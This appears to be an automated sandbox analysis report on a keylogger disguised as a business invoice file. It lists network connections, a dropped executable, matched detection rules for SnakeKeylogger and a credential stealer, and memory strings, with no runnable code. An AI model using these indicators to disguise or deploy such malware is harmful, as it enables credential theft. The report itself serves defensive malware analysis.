                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_00B0E3140_2_00B0E314
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_0671F7300_2_0671F730
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_067196200_2_06719620
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_0671A4580_2_0671A458
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_06717F780_2_06717F78
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_06717F680_2_06717F68
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_06719F480_2_06719F48
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 0_2_06717B400_2_06717B40
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010AC14611_2_010AC146
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A536211_2_010A5362
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010AD27811_2_010AD278
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010AC46811_2_010AC468
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010AC73811_2_010AC738
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010AE98811_2_010AE988
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A69A011_2_010A69A0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010ACA0811_2_010ACA08
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A9DE011_2_010A9DE0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010ACCD811_2_010ACCD8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010ACFA911_2_010ACFA9
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A6FC811_2_010A6FC8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A3E0911_2_010A3E09
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010AF96111_2_010AF961
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010AE97B11_2_010AE97B
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A39EE11_2_010A39EE
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A29EC11_2_010A29EC
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_010A3AA111_2_010A3AA1
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06921E8011_2_06921E80
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692DE0011_2_0692DE00
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_069217A011_2_069217A0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06929C1811_2_06929C18
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692FC6811_2_0692FC68
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06920B3011_2_06920B30
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692932811_2_06929328
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692502811_2_06925028
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692296811_2_06922968
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692E6B011_2_0692E6B0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692E6A011_2_0692E6A0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06921E7011_2_06921E70
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692178F11_2_0692178F
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692EF5111_2_0692EF51
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692EF6011_2_0692EF60
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692CCA011_2_0692CCA0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692DDF111_2_0692DDF1
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692DDFF11_2_0692DDFF
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692D55011_2_0692D550
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692D54011_2_0692D540
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692954811_2_06929548
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692EAF811_2_0692EAF8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692E25811_2_0692E258
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692E24A11_2_0692E24A
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06928B9111_2_06928B91
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692F3B811_2_0692F3B8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06928BA011_2_06928BA0
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692EB0811_2_0692EB08
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06920B2011_2_06920B20
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692D0F811_2_0692D0F8
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692D0E911_2_0692D0E9
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692F81011_2_0692F810
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692501811_2_06925018
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692F80211_2_0692F802
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692000611_2_06920006
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692004011_2_06920040
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692D99911_2_0692D999
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_0692D9A811_2_0692D9A8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_0306E31412_2_0306E314
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_0764E9D012_2_0764E9D0
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_0764962012_2_07649620
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_0764A45812_2_0764A458
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_07647F6812_2_07647F68
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_07647F7812_2_07647F78
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_07649F4812_2_07649F48
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 12_2_07647B4012_2_07647B40
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BC5C020_2_056BC5C0
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BD59920_2_056BD599
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056B77A020_2_056B77A0
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056B537020_2_056B5370
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BD2C820_2_056BD2C8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BCD2820_2_056BCD28
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BEC1820_2_056BEC18
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056B7F1820_2_056B7F18
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BCFF720_2_056BCFF7
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056B596820_2_056B5968
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BAA7820_2_056BAA78
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BCA5820_2_056BCA58
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BC78820_2_056BC788
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BFC4820_2_056BFC48
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BEC0B20_2_056BEC0B
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056B3E0920_2_056B3E09
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056B29EC20_2_056B29EC
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056BF80420_2_056BF804
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_056B3AA120_2_056B3AA1
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07030B3020_2_07030B30
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07031BA820_2_07031BA8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_070397B020_2_070397B0
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703228820_2_07032288
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703529020_2_07035290
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07039ED820_2_07039ED8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703297020_2_07032970
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703CF0820_2_0703CF08
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07030B2020_2_07030B20
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703D36020_2_0703D360
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07031B9720_2_07031B97
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703D7B820_2_0703D7B8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07038E0820_2_07038E08
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703F62020_2_0703F620
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703FA6A20_2_0703FA6A
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07039E7120_2_07039E71
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703FA7820_2_0703FA78
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703227820_2_07032278
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703528020_2_07035280
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703E91720_2_0703E917
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703E91820_2_0703E918
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703296220_2_07032962
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703ED7020_2_0703ED70
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703959020_2_07039590
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703F1C820_2_0703F1C8
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_07038DF920_2_07038DF9
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703DC0120_2_0703DC01
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703DC1020_2_0703DC10
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703003120_2_07030031
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703004020_2_07030040
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703E06720_2_0703E067
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703E06820_2_0703E068
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703E4BF20_2_0703E4BF
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeCode function: 20_2_0703E4C020_2_0703E4C0
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1278452695.00000000005DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1289770203.00000000065B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.0000000003479000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1291849942.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732851560.0000000000D37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeBinary or memory string: OriginalFilenamewxHw.exe6 vs Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GhrKoSGuCdvpJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, -O--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, -O--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
